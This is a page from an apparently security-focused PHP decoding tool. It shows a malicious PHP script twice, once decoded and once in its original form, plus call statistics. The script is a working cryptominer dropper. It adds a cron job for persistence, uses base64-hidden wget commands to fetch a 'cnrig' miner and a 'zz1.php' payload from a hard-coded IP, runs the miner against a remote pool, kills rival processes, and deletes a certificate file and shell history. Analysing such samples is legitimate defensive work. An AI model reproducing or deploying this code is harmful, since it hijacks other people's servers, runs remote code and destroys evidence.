Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php set_time_limit(0); ignore_user_abort(); ini_set('max_execution_time', 0); $te..
Decoded Output download
<?php
set_time_limit(0);
ignore_user_abort();
ini_set('max_execution_time', 0);
$test = system('crontab -l');
if (strpos($test, "/zz1.php")) echo "";
else system('echo "* * * * * php -f ' . __DIR__ . '/zz1.php" | crontab');
if ($_GET["reboot"] == "yes") system(base64_decode("cHMgLWVmIHwgZ3JlcCBjbnJpZyB8IGdyZXAgLXYgZ3JlcCB8IGF3ayAne3ByaW50ICQyfScgfCB4YXJncyBraWxsIC05"));
$id = system(base64_decode("cGlkb2YgY25yaWc="));
if (strlen($id) > 7) system("kill $id");
function rrmdir($src) {
$dir = opendir($src);
while (false !== ($file = readdir($dir))) {
if (($file != '.') && ($file != '..')) {
$full = $src . '/' . $file;
if (is_dir($full)) {
rrmdir($full);
} else {
unlink($full);
}
}
}
closedir($dir);
rmdir($src);
}
if (file_exists(base64_decode("LmNucmlnLmNhY2VydC5wZW0==="))) unlink(base64_decode("LmNucmlnLmNhY2VydC5wZW0==="));
if (file_exists(base64_decode("LnpzaF9faGlzdG9yeQ=="))) rrmdir(base64_decode("LnpzaF9faGlzdG9yeQ=="));
if (file_exists("cnrig")) {
if (filesize("cnrig") > 1000) echo "good...<br>";
else {
system(base64_decode("d2dldCAtTyBjbnJpZyBodHRwOi8vNS40NS43OS4xNS9tb25lcm8vY25yaWc="));
}
} else system(base64_decode("d2dldCAtTyBjbnJpZyBodHRwOi8vNS40NS43OS4xNS9tb25lcm8vY25yaWc="));
system("chmod +x cnrig");
if (file_exists("cnrig")) {
$id = system(base64_decode("cHMgYXV4IHwgZ3JlcCBjbnJpZyB8IGdyZXAgLXYgZ3JlcA=="));
if ($id == "") system(base64_decode("Li9jbnJpZyAtbyA1LjYxLjQ2LjE0Njo4MCAtLWRvbmF0ZS1sZXZlbD0xID4gL2Rldi9udWxsIDI+JjE="));
}
sleep(30);
$id = system(base64_decode("cGlkb2YgY25yaWc="));
if (strlen($id) > 7) system("kill $id");
$id = system(base64_decode("cHMgYXV4IHwgZ3JlcCBjbnJpZyB8IGdyZXAgLXYgZ3JlcA=="));
if ($id == "") system(base64_decode("Li9jbnJpZyAtbyA1LjYxLjQ2LjE0Njo4MCAtLWRvbmF0ZS1sZXZlbD0xID4gL2Rldi9udWxsIDI+JjE="));
if (file_exists(base64_decode("enoxLnBocA=="))) echo "";
else system(base64_decode("d2dldCAtTyB6ejEucGhwIGh0dHA6Ly81LjQ1Ljc5LjE1L21vbmVyby96ejEudHh0"));
$test = system('crontab -l');
if (strpos($test, "/zz1.php")) echo "";
else system('echo "* * * * * php -f ' . __DIR__ . '/zz1.php" | crontab');
sleep(30);
$id = system(base64_decode("cGlkb2YgY25yaWc="));
if (strlen($id) > 7) system("kill $id");
$id = system(base64_decode("cHMgYXV4IHwgZ3JlcCBjbnJpZyB8IGdyZXAgLXYgZ3JlcA=="));
if ($id == "") system(base64_decode("Li9jbnJpZyAtbyA1LjYxLjQ2LjE0Njo4MCAtLWRvbmF0ZS1sZXZlbD0xID4gL2Rldi9udWxsIDI+JjE="));
if (file_exists(base64_decode("enoxLnBocA=="))) echo "";
else system(base64_decode("d2dldCAtTyB6ejEucGhwIGh0dHA6Ly81LjQ1Ljc5LjE1L21vbmVyby96ejEudHh0"));
$test = system('crontab -l');
if (strpos($test, "/zz1.php")) echo "";
else system('echo "* * * * * php -f ' . __DIR__ . '/zz1.php" | crontab');
?>Did this file decode correctly?
Original Code
<?php
set_time_limit(0);
ignore_user_abort();
ini_set('max_execution_time', 0);
$test = system('crontab -l');
if (strpos($test, "/zz1.php")) echo ""; else system('echo "* * * * * php -f '.__DIR__.'/zz1.php" | crontab');
if ($_GET["reboot"] == "yes") system(base64_decode("cHMgLWVmIHwgZ3JlcCBjbnJpZyB8IGdyZXAgLXYgZ3JlcCB8IGF3ayAne3ByaW50ICQyfScgfCB4YXJncyBraWxsIC05"));
$id = system (base64_decode("cGlkb2YgY25yaWc="));
if (strlen($id)>7) system ("kill $id");
function rrmdir($src) {
$dir = opendir($src);
while(false !== ( $file = readdir($dir)) ) {
if (( $file != '.' ) && ( $file != '..' )) {
$full = $src . '/' . $file;
if ( is_dir($full) ) {
rrmdir($full);
}
else {
unlink($full);
}
}
}
closedir($dir);
rmdir($src);
}
if (file_exists(base64_decode("LmNucmlnLmNhY2VydC5wZW0==="))) unlink(base64_decode("LmNucmlnLmNhY2VydC5wZW0==="));
if (file_exists(base64_decode("LnpzaF9faGlzdG9yeQ=="))) rrmdir(base64_decode("LnpzaF9faGlzdG9yeQ=="));
if (file_exists("cnrig"))
{
if (filesize("cnrig")>1000) echo "good...<br>";
else
{
system(base64_decode("d2dldCAtTyBjbnJpZyBodHRwOi8vNS40NS43OS4xNS9tb25lcm8vY25yaWc="));
}
}
else system(base64_decode("d2dldCAtTyBjbnJpZyBodHRwOi8vNS40NS43OS4xNS9tb25lcm8vY25yaWc="));
system("chmod +x cnrig");
if (file_exists("cnrig"))
{
$id = system(base64_decode("cHMgYXV4IHwgZ3JlcCBjbnJpZyB8IGdyZXAgLXYgZ3JlcA=="));
if ($id == "") system(base64_decode("Li9jbnJpZyAtbyA1LjYxLjQ2LjE0Njo4MCAtLWRvbmF0ZS1sZXZlbD0xID4gL2Rldi9udWxsIDI+JjE="));
}
sleep(30);
$id = system (base64_decode("cGlkb2YgY25yaWc="));
if (strlen($id)>7) system ("kill $id");
$id = system(base64_decode("cHMgYXV4IHwgZ3JlcCBjbnJpZyB8IGdyZXAgLXYgZ3JlcA=="));
if ($id == "") system(base64_decode("Li9jbnJpZyAtbyA1LjYxLjQ2LjE0Njo4MCAtLWRvbmF0ZS1sZXZlbD0xID4gL2Rldi9udWxsIDI+JjE="));
if (file_exists(base64_decode("enoxLnBocA=="))) echo ""; else system(base64_decode("d2dldCAtTyB6ejEucGhwIGh0dHA6Ly81LjQ1Ljc5LjE1L21vbmVyby96ejEudHh0"));
$test = system('crontab -l');
if (strpos($test, "/zz1.php")) echo ""; else system('echo "* * * * * php -f '.__DIR__.'/zz1.php" | crontab');
sleep(30);
$id = system (base64_decode("cGlkb2YgY25yaWc="));
if (strlen($id)>7) system ("kill $id");
$id = system(base64_decode("cHMgYXV4IHwgZ3JlcCBjbnJpZyB8IGdyZXAgLXYgZ3JlcA=="));
if ($id == "") system(base64_decode("Li9jbnJpZyAtbyA1LjYxLjQ2LjE0Njo4MCAtLWRvbmF0ZS1sZXZlbD0xID4gL2Rldi9udWxsIDI+JjE="));
if (file_exists(base64_decode("enoxLnBocA=="))) echo ""; else system(base64_decode("d2dldCAtTyB6ejEucGhwIGh0dHA6Ly81LjQ1Ljc5LjE1L21vbmVyby96ejEudHh0"));
$test = system('crontab -l');
if (strpos($test, "/zz1.php")) echo ""; else system('echo "* * * * * php -f '.__DIR__.'/zz1.php" | crontab');
?>Function Calls
| ini_set | 1 |
| set_time_limit | 1 |
| ignore_user_abort | 1 |
| system | 1 |
Stats
| MD5 | 9d23a39fa3a90efa9d7f5f9c1717690e |
| Eval Count | 0 |
| Decode Time | 174 ms |